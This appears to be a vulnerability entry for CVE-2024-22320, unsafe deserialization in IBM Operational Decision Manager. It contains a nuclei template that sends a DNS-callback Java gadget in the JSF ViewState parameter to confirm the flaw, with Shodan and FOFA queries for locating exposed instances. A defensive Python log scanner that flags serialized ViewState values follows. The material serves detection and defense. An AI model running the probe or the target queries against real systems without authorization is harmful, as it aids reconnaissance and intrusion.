CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score confidence: High
EPSS percentile: 97.6%
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by unsafe deserialization. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
id: CVE-2024-22320

info:
  name: IBM Operational Decision Manager - Java Deserialization
  author: DhiyaneshDK
  severity: high
  description: |
    IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by unsafe deserialization. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
  reference:
    - https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22320
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-22320
    cwe-id: CWE-502
    epss-score: 0.38316
    epss-percentile: 0.97125
    cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ibm
    product: operational_decision_manager
    shodan-query:
      - html:"IBM ODM"
      - http.html:"ibm odm"
    fofa-query:
      - title="IBM ODM"
      - title="ibm odm"
      - body="ibm odm"
  tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce

http:
  - method: GET
    path:
      # The JSF ViewState parameter is deserialized server-side. A DNS-only gadget
      # (base64-encoded) proves the deserialization sink without running a command.
      - '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}'

    matchers-condition: and
    matchers:
      # Out-of-band DNS lookup from the target confirms the gadget was deserialized.
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      # The unexpected object then surfaces as a servlet error page.
      - type: word
        part: body
        words:
          - 'javax.servlet.ServletException'

      - type: status
        status:
          - 500
# digest: 490a0046304402205e4a4d30e6df6808d0ce17438a6f11b8c61b769082b39c9bacf8f08ef85f53a402201b25e55f56c429758e34758316d597f7c019ee6fbec6b0b8e127886e429fd275:922c64590222798bb761d5b6d8e72950
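The template above only needs a DNS callback to confirm the sink, but a defender watching an ODM instance wants the matching detection on the wire. The following is an added example, not part of the nuclei template or of IBM's product: it scans constructed access-log lines for a javax.faces.ViewState value that base64-decodes to a Java object stream (header bytes AC ED 00 05, which always base64-encode to a string beginning with "rO0AB"), pulls the first class name out of the stream, and flags the 500 response the template itself keys on. The log format, the sample lines and the stand-in payload (a bare java.util.HashMap descriptor, not a gadget chain) are all constructed for this example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# Java object-stream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (5).
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
VIEWSTATE_PARAM = "javax.faces.ViewState"

# Combined-style access log: only source, timestamp, request target and status are used.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def _constructed_payload() -> str:
    """Stand-in for a gadget chain: stream header, TC_OBJECT, TC_CLASSDESC and a
    java.util.HashMap descriptor. Constructed for this example; not a working gadget."""
    raw = JAVA_SERIAL_MAGIC + b"sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1"
    return base64.b64encode(raw).decode()


# Constructed sample log lines, not taken from any real ODM deployment.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /res/login.jsf HTTP/1.1" 200 5123',
    '10.0.0.5 - - [12/Mar/2024:10:01:03 +0000] "GET /res/login.jsf?%s=%s HTTP/1.1" 500 812'
    % (VIEWSTATE_PARAM, quote(_constructed_payload(), safe="")),
    '10.0.0.9 - - [12/Mar/2024:10:02:11 +0000] "POST /res/login.jsf?%s=-1234567%%3A-7654321 HTTP/1.1" 302 0'
    % VIEWSTATE_PARAM,
])


def decode_viewstate(value: str):
    """Base64-decode a ViewState value, or return None when it is not base64 at all
    (server-side state tokens such as '-1234567:-7654321' fall out here)."""
    candidate = value.replace(" ", "+")  # a '+' in the query may have become a space
    candidate += "=" * (-len(candidate) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None


def is_serialized_java(blob: bytes) -> bool:
    """True when the decoded bytes start with the Java object-stream header."""
    return blob.startswith(JAVA_SERIAL_MAGIC)


def first_class_name(blob: bytes):
    """Name of the first class in the stream: after the header comes TC_OBJECT (0x73),
    TC_CLASSDESC (0x72), then a big-endian u2 length and the class name."""
    if len(blob) < 8 or not blob.startswith(JAVA_SERIAL_MAGIC + b"\x73\x72"):
        return None
    length = int.from_bytes(blob[6:8], "big")
    name = blob[8:8 + length]
    return name.decode("utf-8", "replace") if len(name) == length else None


def scan_log(text: str):
    """Flag every request whose javax.faces.ViewState carries a Java object stream."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for value in parse_qs(query, keep_blank_values=True).get(VIEWSTATE_PARAM, []):
            blob = decode_viewstate(value)
            if blob is None or not is_serialized_java(blob):
                continue
            findings.append({
                "src": m["src"],
                "ts": m["ts"],
                "method": m["method"],
                "status": int(m["status"]),
                "class": first_class_name(blob),
                # A 500 after a serialized ViewState is the same signal the template matches on.
                "server_error": m["status"] == "500",
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The check is deliberately on the decoded bytes rather than on the "rO0AB" prefix alone, so a payload whose first bytes were URL-encoded or split across padding variants is still caught; the class name is only a triage hint, since a real chain starts with whatever outer object the gadget uses, not the class doing the damage.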